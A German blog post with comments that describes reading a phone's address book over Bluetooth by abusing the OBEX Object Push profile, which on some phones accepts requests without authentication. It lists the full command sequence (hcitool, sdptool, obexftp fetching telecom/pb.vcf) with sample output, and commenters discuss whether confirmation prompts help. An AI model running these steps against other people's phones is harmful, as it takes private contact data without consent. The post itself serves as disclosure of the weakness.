Gerade habe ich mal was getestet und hätte nie erwartet das es auch funktioniert. Mit einem großen Aufschrei musste ich feststellen: JA, es geht wirklich. In manchen fällen kann das OBEX-Push Profil eine Handys so ausgenutzt werden das es das eigene Telefonbuch oder andere Sachen sendet. Und das ohne authentifizierung. Das OBEX-Push Profil ist für das Versendung von VCards vorgesehen. Deswegen keine authentifizierung. Und das ganze geht wie folgt
hcitool scan
sucht nach Bluetooth-Geräten im Umfeld
sdptool browse [bluetoothadresse]
da muss nach dem Channel für das OBEX-Push Profil gesucht werden. Bei mir sah das zB so aus
Service Name: OBEX Object Push
Service RecHandle: 0×10043
Service Class ID List:
“OBEX Object Push” (0×1105)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 9
“OBEX” (0×0008)
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“OBEX Object Push” (0×1105)
Version: 0×0100
Und da sehen wir das es Channel 9 bei meinem Handy ist. Nun brauchen wir nur obexftp und etwas Glück
obexftp -b [bluetoothadresse] -B [bluetoothchannel] -g telecom/pb.vcf
und siehe da
Connecting…bt: 1
done
Receiving telecom/pb.vcf…|done
Disconnecting…done
hmm… doof das, so kann mensch bluetooth nicht anlassen..
Hallo,
ich habe das auf meinem iBook und auf meinem Handy so eingestellt, dass ich den Bluetooth-Zugriff bestätigen muss. Wenn also ein anderes Gerät auf mein iBook oder mein Handy via Bluetooth zugreifen will, kommt eine Meldung und ich muss auf “Ja” klicken, um den Zugriff zu erlauben. Ist diese Sicherheitseinstellung dann auch nicht ausreichend?
Grüße,
Andreas
Es kommt drauf an. Wenn OBEX-Push nicht richtig implementiert ist muss ja nichts bestätigt werden. OBEX-PUSH ist nur zum senden da. Bloß bei vielen Handys kann man auf diesen Kanal auch OBEX-Requests machen. Und da liegt halt das Problem. Es gibt natürlich noch viele andere Möglichkeiten. Zum Beispiel gibt es ein paar Kanäle die offen sind und wo nicht nach einem Pin gefragt wird.